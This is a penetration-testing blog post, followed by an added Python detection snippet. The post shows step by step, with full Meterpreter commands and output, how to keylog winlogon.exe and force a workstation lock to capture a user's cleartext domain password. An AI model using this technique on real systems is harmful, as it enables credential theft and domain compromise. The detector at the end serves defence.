
Keylogging domain creds; who needs a hash? Lock the victim’s workstation to order and snarf them immediately

Chris Pickering 03 Mar 2014

So, recently I was onsite on a client network. I had compromised the local desktop and had the local administrator password. There was only one set of domain cached creds and these were not cracked, indicating a strong domain password policy. The servers were out of scope for this assessment – so how to elevate privilege on the domain?

Using our local admin (more than likely shared over multiple desktop machines) we can scan the attached subnet for machine names and logged-on users using wmic as follows:

C:\Users\chris>wmic /node:127.0.0.1 computersystem GET name, username
Name UserName
CHRIS-WIN7 chris-win7\chris

Next we pick our target: if we're lucky, the IT manager or HR manager is on the same subnet. If not, target any user to gain leverage on the domain.

Using our shared local admin creds and the psexec function of Metasploit we throw over a connect back: time for some fun!

Get your keylogger running in the winlogon process on the target machine. Then pop a second Meterpreter session, migrate to explorer.exe and use rundll LockWorkStation.

Result? The workstation locks, the user is forced to log in and you get their clear text domain credentials on a plate.

Would they be suspicious? I’m not sure. It’s certainly quicker than leaving your shell open for ages, waiting for the lucky logging of their creds.

If they follow bad practice and rarely lock their workstation, then you might end up waiting all day for those creds. That is all time in which your shell might get detected, so speed up the snarfing!

Here’s how:

Get your shell connected:

[*] Meterpreter session 1 opened (192.168.135.11:80 -> 192.168.131.92:53262)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

Check running processes, note explorer.exe and winlogon:

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
348 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
364 6064 winlogon.exe x86_64 2 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
380 564 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\vmnat.exe
<.cut.>
5412 6448 SnagPriv.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\SnagPriv.exe
5512 1020 dwm.exe x86_64 2 EU\x.x C:\Windows\System32\dwm.exe
5664 5860 explorer.exe x86_64 2 EU\x.x C:\Windows\explorer.exe
6016 5560 PccNTMon.exe x86_64 2 EU\x.x C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTMon.exe
<. cut. >

Migrate to explorer.exe for everyday sniffing:

meterpreter > migrate 5664
[*] Migrating from 1596 to 5664…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer..

meterpreter > keyscan_dump
Dumping captured keystrokes…
Dear Dave blah blah blah.

Is this guy ever going to enter his domain creds?

To grab user creds migrate to winlogon.exe:

meterpreter > migrate 364
[*] Migrating from 5664 to 364…
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > background

Now you have to wait for them to lock their screen and log on again. But why not lock their screen for them? Pop another Meterpreter session, move to explorer.exe and issue a rundll LockWorkStation command as follows:

[*] Meterpreter session 12 opened (192.168.135.11:80 -> 192.168.131.92:54370)
msf exploit(handler) > sessions -i 12
[*] Starting interaction with 12…

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
<. cut. >
5664 5860 explorer.exe x86_64 2 EU\x.x C:\Windows\explorer.exe
6016 5560 PccNTMon.exe x86_64 2 EU\x.x C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTMon.exe
6340 6448 TscHelp.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\TSCHelp.exe
6448 5664 Snagit32.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\Snagit32.exe
<. cut. >

meterpreter > migrate 5664
[*] Migrating from 5212 to 5664…
[*] Migration completed successfully.
meterpreter > shell
Process 3868 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>rundll32.exe user32.dll, LockWorkStation
rundll32.exe user32.dll, LockWorkStation

C:\Windows\system32>exit

Now go back to your original shell and keylog the winlogon.exe process:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > keyscan_dump
Dumping captured keystrokes…
<Ctrl> <LCtrl> <LMenu> <Alt> <Delete> <Back> <Back> 1$uper$trongPassword$1 <Return>

WIN!!
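
From the defender's side, the sequence above leaves two observable events on the target host: a thread injected into winlogon.exe and a rundll32 LockWorkStation call shortly afterwards. The following Python is an added example, not part of the original post; it correlates the two per host over constructed sample records. It assumes events arrive as simplified Sysmon-style dictionaries (ID 1 process creation, ID 8 CreateRemoteThread) with hypothetical field names, and that the injection surfaces as an ID 8 record.

```python
import re

# Matches "rundll32[.exe] user32.dll,LockWorkStation", with or without a space after the comma.
LOCK_RE = re.compile(r'rundll32(\.exe)?"?\s+.*user32(\.dll)?\s*,\s*LockWorkStation', re.I)

# Constructed sample events (not from the original post). Field names are
# hypothetical; ids follow Sysmon: 1 = process creation, 8 = CreateRemoteThread.
EVENTS = [
    {"t": 100, "host": "WS01", "id": 8, "source": r"C:\Windows\Temp\a.exe",
     "target": r"C:\Windows\System32\winlogon.exe"},
    {"t": 160, "host": "WS01", "id": 1,
     "cmdline": "rundll32.exe user32.dll, LockWorkStation"},
    {"t": 200, "host": "WS02", "id": 1,
     "cmdline": r"C:\Windows\System32\rundll32.exe user32.dll,LockWorkStation"},
    {"t": 300, "host": "WS03", "id": 1,
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

def is_scripted_lock(ev):
    return ev["id"] == 1 and bool(LOCK_RE.search(ev.get("cmdline", "")))

def is_winlogon_injection(ev):
    return ev["id"] == 8 and ev.get("target", "").lower().endswith("\\winlogon.exe")

def detect(events, window=900):
    """Return (host, severity, reason) alerts. Severity is high when a scripted
    lock follows a remote thread in winlogon.exe on that host within `window` s."""
    alerts, last_injection = [], {}
    for ev in sorted(events, key=lambda e: e["t"]):
        host = ev["host"]
        if is_winlogon_injection(ev):
            last_injection[host] = ev["t"]
            alerts.append((host, "medium", "remote thread created in winlogon.exe"))
        elif is_scripted_lock(ev):
            seen = last_injection.get(host)
            if seen is not None and ev["t"] - seen <= window:
                alerts.append((host, "high", "forced lock after winlogon.exe injection"))
            else:
                alerts.append((host, "low", "workstation locked from a command line"))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert, sep=" | ")
```

The 900-second window is an arbitrary starting value to tune against your own telemetry.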